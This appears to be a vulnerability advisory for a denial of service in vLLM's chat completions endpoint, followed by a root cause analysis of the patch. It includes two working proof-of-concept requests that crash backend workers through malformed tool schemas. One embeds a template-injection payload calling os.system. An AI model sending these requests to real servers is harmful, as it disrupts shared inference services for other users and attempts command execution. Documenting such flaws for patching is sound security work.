{ "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "max_tokens": 1 }
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.
POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 718 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive
{ "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "max_tokens": 32, "temperature": 0.2, "top_p": 1, "n": 1 }
Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.
Python| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| vllm | pip | >= 0.8.0, < 0.9.0 | 0.9.0 |
Miggo AIRoot Cause AnalysisThe vulnerability (GHSA-vrq3-r879-7m65) describes a Denial of Service in vLLM's /v1/chat/completions endpoint due to improper validation of pattern and type fields in tool schemas. Malformed pattern fields can crash the C++ regex_converter.cc, and unsupported type fields can crash json_schema_converter.cc.
The provided fix (PR #18454, commits 2d9ca06... and 8de207a...) primarily involves replacing Python's standard re library with the regex library across various files. This change is aimed at improving regex parsing performance and preventing catastrophic backtracking (ReDoS), which directly addresses the DoS vector for the pattern field if Python's regex engine is involved in its processing.
The ServingChat.chat_completion method in vllm/entrypoints/openai/serving_chat.py is the entry point that receives the user request containing tool definitions. If this method, or helper functions it calls that inherit its regex as re import scope, compile or process the pattern from a tool's JSON schema using Python's regex engine, the switch to the regex library serves as a mitigation. This is because the regex library is generally more robust against malformed patterns and ReDoS attacks compared to the standard re module.
Similarly, if the XGrammarLogitsProcessor (used for JSON schema-based guided decoding) processes schemas containing pattern fields, and if the underlying xgrammar library or operations within XGrammarLogitsProcessor were to use Python's regex engine, the patch to xgrammar_decoding.py (importing regex as re) would apply. However, the link here is less direct as xgrammar is an external library.
It's important to note that the provided patches (switching re to regex) do not appear to directly address the vulnerability related to the type field and the json_schema_converter.cc crash. The fix for that aspect might be in a different patch or was not included in the provided commit information. The analysis here focuses on the impact of the re -> regex change on the pattern field vulnerability.
The root cause for the pattern-related DoS is the lack of sufficient validation before passing a user-controlled regex pattern to a regex engine, which could be either Python's engine (now regex) or a C++ component like regex_converter.cc. The patch strengthens the Python-side regex handling.
KEV Misses 88% of Exploited CVEs- Get the report
